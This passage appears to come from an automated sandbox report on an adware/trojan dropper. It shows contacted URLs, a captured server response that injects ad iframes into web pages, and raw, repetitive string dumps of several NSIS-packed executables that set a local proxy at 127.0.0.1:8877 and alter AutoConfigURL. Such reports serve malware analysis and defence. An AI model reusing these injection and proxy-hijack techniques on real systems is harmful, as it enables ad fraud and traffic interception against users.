kds.adspirit.de/adscript.php?pid=133&ord=[timestamp]..VVV.download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.microsoft.com/en-us/download/confirmation.aspx?id=9905..microsoft.com/en-us/download/confirmation.aspx?id=9905..ads.pubmatic.com/AdServer/js/showad.js..download.cnet.com/Comodo-Internet-Security-Premium/3000-2239_4-10460704.html..filehippo.com/download_comodo..VVV.filehippo.com/download_comodo..VVV.tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..VVV.pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/article2/0,2817,2457135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..b.scorecardresearch.com/beacon.js..d.gettvwizard.com/l/load.js..d.instashareonline.com/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23DDUS&bp=PB3&g=a636a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..VVV.filehippo.com/download_malwarebytes_anti_malware/59476..filehippo.com/download_malwarebytes_anti_malware/59476..origin.languages.malwarebytes.org/downloads/..download.cnet.com/Malwarebytes-Anti-Malware/
<<< skipped >>>
GET /act/txt/vv.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
5d26..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div class="mapAndAttrs"><iframe width="300" height="250" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><button class="reply_button js-only">..all;;;;;;;;;;;<header class="bchead">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><header class="bchead">..all;;;;;;;;;;;<ul class="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=http://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><ul class="clfooter">..kds.adspirit.de;;;;;;;;;;;top.location.href;;;;;;;;;;;abcd..installpath.com;;;;;;;;;;;<div style="margin:0 auto; width:320px; height:270px;">;;;;;;;;;;;<iframe width="850" height="480" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexRB.php?a=11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;;;;;;;
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
wincheckfe.exe_1768:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
.reloc
.reloc
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
FindProcDLL.dll
FindProcDLL.dll
System.dll
System.dll
callback%d
callback%d
g.ZO||k[
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
nsw6.tmp
nsw6.tmp
C:\a\wincheckfe.exe
C:\a\wincheckfe.exe
wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg5.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
DYK287G2Jhwy64P0Ln0s.exe_1012:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
ication Data\apDYK287G2Jhwy64P0Ln0s.html
ication Data\apDYK287G2Jhwy64P0Ln0s.html
rome.exe
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
Override: || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
Override: || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
.reloc
.reloc
SShL0
SShL0
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
nsExec.dll
nsExec.dll
9Â9|9
9Â9|9
: :0:5:>:
: :0:5:>:
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
9!9-9B9}9
9!9-9B9}9
g.ZO||k[
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html
A~loogg2.txt
A~loogg2.txt
hwy64P0Ln0s.html
hwy64P0Ln0s.html
PDYK2~1.HTM
PDYK2~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
tml/fide/lo2DYK287G2Jhwy64P0Ln0s.txt
tml/fide/lo2DYK287G2Jhwy64P0Ln0s.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
1464376
1464376
winonit.exe
winonit.exe
0Ln0s.exe
0Ln0s.exe
1495012
1495012
C:\a\DYK287G2Jhwy64P0Ln0s.exe
C:\a\DYK287G2Jhwy64P0Ln0s.exe
DYK287G2Jhwy64P0Ln0s.exe
DYK287G2Jhwy64P0Ln0s.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg4.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
C:\a\internetport3.exe
6.0.2900.5512
6.0.2900.5512
63839615.bat
63839615.bat
.exe" -n vmusr
.exe" -n vmusr
wcheckf.exe
wcheckf.exe
wincheckfe.exe
wincheckfe.exe
Nullsoft Install System v2.46
Nullsoft Install System v2.46
ttps=127.0.0.1:8877
ttps=127.0.0.1:8877
tport3.exe
tport3.exe
5.bat
5.bat
port3.exe
port3.exe
Tools\vmtoolsd.exe" -n vmusr
Tools\vmtoolsd.exe" -n vmusr
DYK287G2Jhwy64P0Ln0s.exe_1012_rwx_10004000_00001000:
callback%d
callback%d
wincheckfe.exe_1768_rwx_10004000_00001000:
callback%d
callback%d
wcheckf.exe_484:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
%Program Files%\Google\Chrome\Application\chrome.exe
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
e.exe
a\Google\Chrome\Application\chrome.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
on\Internet Settings AutoConfigURL
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
@.reloc
@.reloc
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
9!9-9B9}9
9!9-9B9}9
!%[ %S
!%[ %S
g.ZO||k[
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
nsg8.tmp
nsg8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
C:\a\wcheckf.exe
C:\a\wcheckf.exe
wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg7.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
wcheckf.exe_484_rwx_10004000_00001000:
callback%d
callback%d
winonit.exe_1360:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
.reloc
.reloc
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
MSVCRT.dll
MSVCRT.dll
KillProcDLL.dll
KillProcDLL.dll
u.Uj@
u.Uj@
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
9!9-9B9}9
9!9-9B9}9
\.lR%
\.lR%
g.ZO||k[
g.ZO||k[
C:\a\avv.txt
C:\a\avv.txt
avv.txt
avv.txt
m\LOCALS~1\Temp\nshA.tmp
m\LOCALS~1\Temp\nshA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
C:\a\winonit.exe
C:\a\winonit.exe
winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh9.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
winonit.exe_1360_rwx_10004000_00001000:
callback%d
callback%d
getcap.exe_500:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\a\7za.exe
\a\7za.exe
S~1\Temp\nsyD.tmp\System.dll
S~1\Temp\nsyD.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
C:\a\ukey.ini
C:\a\ukey.ini
7za.exe
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
GetCPInfo
GetCPInfo
MB, # %s =
MB, # %s =
RAM %s
RAM %s
Data Error in encrypted file. Wrong password?
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Unsupported Method
Can not open encrypted archive. Wrong password?
Can not open encrypted archive. Wrong password?
Unsupported archive type
Unsupported archive type
-p{Password}: set Password
-p{Password}: set Password
is not supported archive
is not supported archive
Enter password (will not be echoed):
Enter password (will not be echoed):
Advapi32.dll
Advapi32.dll
kernel32.dll
kernel32.dll
update operations are not supported for this archive
update operations are not supported for this archive
Mapi32.dll
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
OLEAUT32.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
E%SsK*X|
E%SsK*X|
, .MN6b
, .MN6b
1%uhx
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
ukey.ini
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
C:\a\getcap.exe
C:\a\getcap.exe
getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
H7zCon.sfx
H7zCon.sfx
7-Zip cannot load Mapi32.dll
7-Zip cannot load Mapi32.dll
A* * .tar .tar
A* * .tar .tar
B* .tar
B* .tar
getcap.exe_500_rwx_10004000_00001000:
callback%d
callback%d
vchk.exe_1976:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
